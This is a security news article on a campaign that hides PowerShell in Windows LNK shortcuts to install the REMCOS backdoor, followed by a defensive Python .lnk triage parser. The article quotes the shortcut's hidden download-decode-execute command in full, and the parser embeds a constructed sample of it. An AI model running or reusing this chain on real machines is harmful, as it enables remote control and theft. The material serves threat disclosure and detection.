New Malware Attack Weaponizing LNK Files to Install The REMCOS Backdoor on Windows Machines

Posted on August 4, 2025 By CWS

In recent weeks, cybersecurity teams have observed a surge in malicious campaigns abusing Windows shortcut (LNK) files to deliver sophisticated backdoors.

This new wave of attacks disguises LNK shortcuts as innocuous documents or folders, relying on Windows' default behavior of hiding known file extensions to deceive users.

Once executed, the shortcut silently invokes PowerShell with hidden window parameters, fetching and decoding a Base64 payload that ultimately installs the REMCOS backdoor.

The stealthy nature of this chain, which combines social engineering, fileless scripting, and living-off-the-land binaries, underscores the evolving tactics of threat actors targeting enterprise environments.

Point Wild analysts noted that the initial delivery typically arrives via phishing emails, with attachments labeled as invoices or shipping documents.

In other cases, threat actors plant these malicious shortcuts inside ZIP or RAR archives on network shares, relying on casual browsing to trigger execution.

How an LNK file looks to a normal user (Source – Point Wild)

Upon double-clicking, the LNK file silently launches powershell.exe -WindowStyle hidden -Command (…), directing the victim's machine to download an obfuscated payload from a remote server.

Point Wild researchers identified that the downloaded file masquerades with a .GIF extension but contains Base64-encoded binary data.

The campaign's backbone is a multi-stage infection workflow. The embedded PowerShell script retrieves an encoded text resource, writes it to C:\ProgramData\HEW.GIF, decodes it into a Windows PIF file named CHROME.PIF via [System.Convert]::FromBase64String, then executes this binary.

Content of the LNK file (Source – Point Wild)

The PIF file, disguised as a Chrome-themed program, leverages legacy support for MS-DOS shortcuts to bypass modern security warnings. Once launched, it drops additional artifacts, including a scheduled task shortcut and a URL file, to ensure persistence and facilitate further payload execution.

Impact assessments reveal that the REMCOS backdoor grants attackers full remote control over compromised hosts.

REMCOS communicates over TCP with a custom binary protocol, enabling arbitrary shell command execution, file transfer, keylogging, and even webcam capture.

Victims often remain unaware of the breach, because the malware stores keystroke logs in C:\ProgramData\remcos\logs.dat and establishes encrypted channels with command-and-control servers hosted in Eastern Europe.

The combination of stealthy execution and robust remote capabilities poses a significant risk to corporate networks, where lateral movement and data exfiltration can follow initial compromise.

Infection Mechanism

The infection mechanism hinges on abusing LNK file properties to load malicious commands. Unlike Office macros, LNK files do not trigger macro security warnings, allowing execution without arousing user suspicion.

In this campaign, the LNK's "Target" field is set to:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile(' $file="C:\ProgramData\HEW.GIF"; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\ProgramData\CHROME.PIF -Encoding Byte; start C:\ProgramData\CHROME.PIF

This single-line command demonstrates the elegance of fileless attacks: it uses System.Net.WebClient to fetch the Base64 blob, then decodes and executes it entirely in memory.

The infection workflow shows how Windows displays the deceptive .lnk icon, hiding the actual payload path.

Infection Workflow (Source – Point Wild)

Attackers further evade detection by embedding malware inside Alternate Data Streams or crafting the icon path to point to malicious DLLs, triggering code execution when Windows attempts to render the shortcut icon.

By weaponizing LNK files, adversaries bypass many endpoint protections that focus on executable file blocking and macro detection.

The reliance on trusted system binaries, such as PowerShell and CMD, allows the REMCOS installer to evade signature-based antivirus tools.

For defenders, monitoring unusual PowerShell invocations and outbound connections to suspicious domains like shipping-hr.ro is essential.

Enhanced visibility into scheduled tasks, ADS usage, and newly created .PIF files will help identify and contain this emerging threat.
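Triage of a suspect shortcut starts with reading the "Target" arguments that Explorer hides. The following Python parser is an added example, not code from the article or from Point Wild: it walks the MS-SHLLINK header and StringData section to recover the command line and ShowCommand, then flags the markers this article describes (hidden PowerShell window, FromBase64String, a .PIF written under ProgramData). The sample .lnk is constructed inline from those markers; it is not a capture from the campaign, and the marker list is an assumption drawn from the article's command.

```python
import struct

# MS-SHLLINK constants: the ShellLinkHeader is 76 bytes, LinkCLSID is 00021401-0000-0000-C000-000000000046.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR,
 HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
# Markers taken from the command line described in the article (assumed list, extend per environment).
SUSPICIOUS = ("powershell", "-windowstyle hidden", "frombase64string", "downloadfile", ".pif", "programdata")

def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData section; return ShowCommand plus any string fields."""
    if len(data) < 76 or data[:4] != struct.pack("<I", 76) or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, show_command = struct.unpack_from("<I", data, 20)[0], struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_IDLIST:    # skip LinkTargetIDList: IDListSize(2) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # skip LinkInfo: LinkInfoSize(4) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_FIELDS:  # each field: CountCharacters(2) then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            out[name] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return out

def triage_lnk(data: bytes) -> list:
    """Return the markers from the article's chain found in the shortcut's path and arguments."""
    fields = parse_lnk(data)
    text = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    hits = [s for s in SUSPICIOUS if s in text]
    if fields["show_command"] == 7:  # SW_SHOWMINNOACTIVE: the window opens minimized, out of the user's view
        hits.append("show_minimized")
    return hits

def build_lnk(relative_path: str, arguments: str, icon: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (constructed sample, not a real capture)."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = (struct.pack("<I", 76) + LNK_CLSID + struct.pack("<I", flags) + bytes(36)   # attrs, times, size, icon
              + struct.pack("<I", show_command) + bytes(12))                              # ShowCommand, hotkey, reserved
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments, icon))
    return header + body

# Constructed sample mirroring the article's shortcut: PowerShell target, hidden window, Base64 decode to a .PIF.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-WindowStyle hidden -Command "[Convert]::FromBase64String((Get-Content C:\ProgramData\HEW.GIF))'
    r' | Set-Content C:\ProgramData\CHROME.PIF -Encoding Byte"',
    r"%SystemRoot%\System32\shell32.dll", show_command=7)
```

Run `triage_lnk(open(path, "rb").read())` over shortcuts pulled from mail attachments or archives on shares; an empty list for a document shortcut and a multi-marker list for the sample above is the expected contrast.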
